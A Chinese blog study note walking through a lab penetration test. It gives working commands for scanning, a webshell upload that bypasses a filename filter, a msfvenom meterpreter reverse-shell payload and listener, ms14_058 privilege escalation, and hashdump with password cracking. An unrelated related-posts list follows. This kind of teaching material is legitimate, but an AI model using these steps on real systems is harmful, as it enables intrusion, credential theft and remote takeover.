【学习笔记】渗透测试过程1
1. 设置网络环境
将 Kali 虚拟机和靶机的网络适配器改为桥接模式。
在 Kali 虚拟机和靶机相互 ping 通,确保网络连通性。
切换到
root模式进行操作。Nmap(用于信息收集 资产探测:ip存活、系统、软件、软件版本、端口)
扫描网段:
1
nmap -sn 192.168.42.0/24
查看网段中存活的主机。
全面扫描靶机:
1
nmap -A <靶机IP>
在本实验获取数据库端口(1433)。
判断系统类型:
1
nmap -O <靶机IP>
在
running:后面查看主机系统信息。【图片2】
服务版本扫描(运行软件):
1
nmap -sV <靶机IP>
端口扫描:
1
nmap -p1-65535 (目标端口)<靶机IP>
端口 27689 测试:扫描出异常(unknown)端口,在浏览器访问
<靶机IP>:27689。
随机 IP 扫描:
1
nmap -v -iR(随机) <数量> -Pn -p 80
如果对方开了防火墙——(报)filtered http
3. 目录结构探测 - 使用 Dirsearch获取
安装 Dirsearch,用于获取网站目录结构(取决于字典):
1
dirsearch -u http://<靶机IP>:27689/ -I 200,302
200 和 302 表示返回的状态码。
逐步访问上述图片获取的文件,在浏览器输入
http://<靶机IP>:27689/<文件名>。在访问
web.config.bak文件,得到数据库信息:- 数据库 IP:192.168.61.144
- 数据库名称:FileManage
- 用户名:down
- 密码:downsql
4. 数据库连接 - 使用 Navicat 连接
- 下载并安装 Navicat,使用上述数据库信息进行登录。
- 若连接不上,可以将 Navicat 通过 FTP 安装到虚拟机。
5. 网站管理
- 回到网站
<靶机IP>:27689,在用户管理模块进行操作。(登入——用户管理——管理用户)
6. 上传一句话木马
生成一句话木马文件,在网站下载管理模块上传文件:
文件命名为
aaaaaaaaa.aspx.jpg(利用文件名过长被截断的特性,上传后网站删除.jpg)。
上传成功后,一访问就下载:无法解析函数
获取文件绝对路径:通过访问不存在的文件查看报错,找到路径
/upfile/affix/。
7. 连接木马
- 使用蚁剑连接上传的
aspx文件。
8. 生成并上传 MSF 木马
生成 MSF 木马:
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<靶机IP> LPORT=6666 -f exe -o 123.exe
IP 是 Kali 虚拟机的 IP 地址。
启动监听器:
1
2
3
4
5
6msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <靶机IP>
set LPORT 6666
run
将木马的exe文件从kali复制到主机,然后上传到蚁剑对应位置
(进入/web/upfile/affix/,右键上传)
启动木马文件:
右键⽊⻢⽂件,打开终端 输⼊如下命令
1
dir 123.exe
如果成功,Kali 会成功上线(回到kali终端查看)。
发现kali成功上线后 可查看到run的执⾏结果(如下图)
它⾃动的为我们匹配出了⼀些可能的⽤于易受攻击⽬标提权的漏洞利⽤模块
9. 提权操作
使用以下命令检查提权模块:
1
2bg
sessions
提权操作:
1
2
3use multi/recon/local_exploit_suggester
set session 1
run
搜索并利用提权漏洞:
1
2
3
4search ms14_058
use exploit/windows/local/ms14_058_track_popup_menu
set session 1
run
检查权限:
1
getuid
发现已经是最高权限
10. 持久化攻击
- 获取
administrator密码:- 使用
hashdump模块提取密码 hash。
已经可以看到相关账户密码加密后的hash了
- 将 hash 上传至 cmd5.com 进行解密,得到密码为
admin123。
- 使用
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 EIGHTJIU!
相关推荐
2025-04-20
MobaXterm操作
前置条件利用ubantu系统在VMware上配置Linux系统虚拟机 【两分半钟完成VMware安装及Linux-Ubuntu安装(全程无废话)】https://www.bilibili.com/video/BV1W34y1k7ge?vd_source=8d7dd382f6f8f6be47abce702685a0b0 (参考此视频) 虚拟机上Ssh的开启与安装 【Linux虚拟机开启SSH服务 - CSDN App】http://t.csdnimg.cn/JE5nY Ps:还要注意要将虚拟机和电脑主机的防火墙关闭 过程一、查看虚拟机的 Host 信息启动 VMware 虚拟机,进入 Ubuntu 系统。在虚拟机内,点击 应用程序,然后选择 终端 打开命令行界面。(或者直接快捷键Ctrl + Alt + T 打开终端)输入命令 ifconfig 查看虚拟机的 IP 地址和主机信息。红框中显示的是虚拟机的 IP 地址。 下面显示的是虚拟机的用户名(如:root123)。 注:用户名和密码是创建虚拟机时设定的。 二、通过 MobaXterm 连接虚拟机 打开 MobaXterm...
2025-01-11
TEE的初步理解与认识
【论文阅读摘要】 关键词:可信执行环境 定义可信执行环境(trusted execution environment, TEE)技术,用于保护非可信平台中应用和数据可信 执行. TEE 通常采用隔离部分软硬件资源的方法构 建安全区域,确保在其中运行的程序和数据保密性 和完整性不受外部干扰。 一个可靠的TEE 需要提供 4 方面的安全保障 1)数据隔离:一个可信应用使用的数据不能被其他应用访问、修改,包括可信应用的数据对外部操作系统隔离以及多个可信应用之间的数据隔离.。 2)计算隔离:可信应用的计算资源不能被其他应用观测和拦截,同时需要清理可信应用执行后的痕迹,并防御来自侧信道的攻击。 3)通信控制:非可信应用和可信应用、多个可信应用之间的会话和数据交互不能破坏隔离性. 4) 错误隔离:非可信区域的安 全漏洞不能扩散到可信应用中. 实用的 TEE 设计思路是基于硬件隔离基础,通过数据加解密和特权指令执行实现其安 全服务. 特点现有的 TEE 技术具有 3 个明显特点 1)面向用户设计 2)硬件辅助支持设计:从基于 x86 到 RISC-V 架 构的平台均引入了新硬件特性 3)共...
2024-10-23
【学习笔记】简单网络结构的搭建/vlan配置
(重新粗糙存档一下,过程图基本都丢失了,仅用于个人学习笔记使用) 网络基础架构图 网络通信的原理 软件的使用 a. 关于拓扑图: 接入层交换机,汇聚层交换机 b.技术实现6要求 Vlan trunk 不同vlan间的通信(三层交换技术)交换机的基础命令/知识: vlan: 虚拟局域网 vlan trunk stp 链路聚合 hsrp(vrrp)——公司内部的网络系统 将pc1和pc2放入不同vlan可以实现隔离 (同一虚拟网之间的电脑可以通信,不同的不可通信) vlan范围: 1-4094 关于常见接口类型: 交换机常见接口类型:有Access和trunk Access用来接入终端,电脑,打印机,服务器 trunk用在交换机与交换机之间 trunk技术解决交换机之间传输vlan数据的问题 命令行敲错后,跳出卡顿:ctrl+shift+1 三种模式: Enable # Config Exit 退出 查看都在#模式中; 配置文件的查看:show run (running-config...
2025-01-10
关于架构
企业架构 企业架构是企业进行项目决策的重要依据,同时也是支撑企业后续发展的重要基石。业务架构、数据架构、应用架构和技术架构是企业架构中的四个主要架构,它们在关注的方面和功能上有所不同,但是它们是相互关联和相互支持的,共同构成了企业的总体架构。 企业架构之4A架构4A架构关键词: 业务架构:战略,价值链,端到端,业务流程,业务组件,自上而下分解 应用架构:系统建设,系统集成,中台,自下而上抽象 技术架构:技术选型,框架,PaaS平台,云原生,DevOps,微服务,容器化,部署架构 数据架构:数据标准,数据采集加工,数据入湖,数据治理,数据共享服务,数据安全,数据质量,数据架构 【1】 业务结构业务架构定义了业务策略、治理、组织和关键业务过程。是企业架构的核心内容,承接了企业战略,直接决定企业战略的实现能力,是其他架构领域工作的前置条件。 主要目标是根据企业战略愿景,分析业务现状,识别现有业务能力及问题,提出业务改进需求,设计目标业务架构。(以价值链梳理分析业务开展流程,识别上下游依赖关系,从业务和产品的视角,描述整个平台或者产品的实现) 设计步骤: 识别战略,走访业务部门,问卷...
2025-08-05
3CDaemon + MobaXterm运维
3CDaemon + MobaXterm 运维学习笔记📑 目录 一、FTP 配置与使用 二、SSH 与 SFTP 基础 三、BS 运维(Browser–Server 模式) 四、CS 运维(Client–Server 模式) 参考链接与原文标题 一、FTP 配置与使用 3CDaemon 创建 FTP 用户 打开 3CDaemon → 点击 FTP 用户(创建前先选择一个真实存在的文件夹路径,例如 D:\)。 新建用户: 账号:admin 密码:123123 确认保存。 开启 FTP 服务 进入 配置 → 服务管理 → 端口配置。 默认端口为 21,如需自定义可改为 20021。 在堡垒机添加 FTP 资产 新建资产: IP:主机 IP 端口:FTP 服务端口(如 21 或 20021) 删除系统自带账号,添加刚刚在 3CDaemon 中新建的账号(用户名:admin,密码:123123)。 服务类型选择 FTP。 确认保存。 在 授权管理 中,为刚建的资产分配用户权限。 MobaXterm 连接 FTP 在 个人工作台 中找到刚建的 FTP 资产,使用 ...
2024-11-21
如何提pr&vscode如何连上wsl
参与开源项目流程(Fork & PR) Fork 仓库 在目标开源项目页面点击 Fork,将项目复制到自己的 GitHub 账户。 克隆到本地 在自己 Fork 的仓库点击 Code 按钮,复制 HTTP/SSH 链接。 在 Git Bash 执行: 12345bash复制编辑git clone 链接地址 修改代码 创建分支 → 修改代码 → 提交到自己的远程仓库。 发起 Pull Request (PR) GitHub 会在原仓库页面提醒你当前有新提交可 PR。 点击绿色按钮(建议使用提醒中的按钮),填写必要信息提交,等待仓库维护者审核合并。 更新 Fork 仓库(与原项目同步) 关联原仓库 12345bash复制编辑git remote add upstream 原仓库链接 获取原仓库最新代码 12345bash复制编辑git fetch upstream 合并到本地主分支 12345bash复制编辑git merge upstream/master 推送到远程 Fork 仓库(可选) 12345bash复制编辑git p...
评论